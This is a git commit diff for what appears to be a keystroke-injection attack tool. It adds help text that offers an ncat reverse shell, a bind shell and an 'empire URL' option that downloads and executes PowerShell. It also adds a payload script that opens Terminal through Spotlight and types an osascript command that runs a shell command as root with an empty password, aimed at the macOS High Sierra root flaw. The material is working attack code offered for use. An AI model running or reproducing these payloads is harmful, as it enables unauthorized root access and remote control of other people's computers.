OSX High Sierra Root Exec + Help (commands)
parent
5936a85c29
commit
b0a553deba
|
@ -20,6 +20,13 @@ def banner():
|
||||||
print("-------------------------------------------------------------------")
|
print("-------------------------------------------------------------------")
|
||||||
|
|
||||||
def help():
|
def help():
|
||||||
|
print("--------------[ Events ]--------------")
|
||||||
|
print("q/exit => exit the program")
|
||||||
|
print("h/help => display this help message")
|
||||||
|
print("reverse => use a basic reverse-shell based on ncat")
|
||||||
|
print("bind => set up a bind-shell")
|
||||||
|
print("empire URL => download and execute a powershell string")
|
||||||
|
print("send MSG => write MSG")
|
||||||
print("--------------[ Commands ]--------------")
|
print("--------------[ Commands ]--------------")
|
||||||
print("Comment => Rem: Comment")
|
print("Comment => Rem: Comment")
|
||||||
print("Delay => CustomDelay:1000")
|
print("Delay => CustomDelay:1000")
|
||||||
|
|
|
@ -0,0 +1,10 @@
|
||||||
|
Rem:Title: OSX High Seria Root Exec (COMMAND+SPACE)
|
||||||
|
CustomDelay:1000
|
||||||
|
Press:131+32
|
||||||
|
Print:terminal
|
||||||
|
CustomDelay:500
|
||||||
|
Press:176
|
||||||
|
CustomDelay:3000
|
||||||
|
Print:osascript -e 'do shell script \"%s\" with administrator privileges user name \"root\" password \"\"'
|
||||||
|
CustomDelay:500
|
||||||
|
Press:176
|
Loading…
Reference in New Issue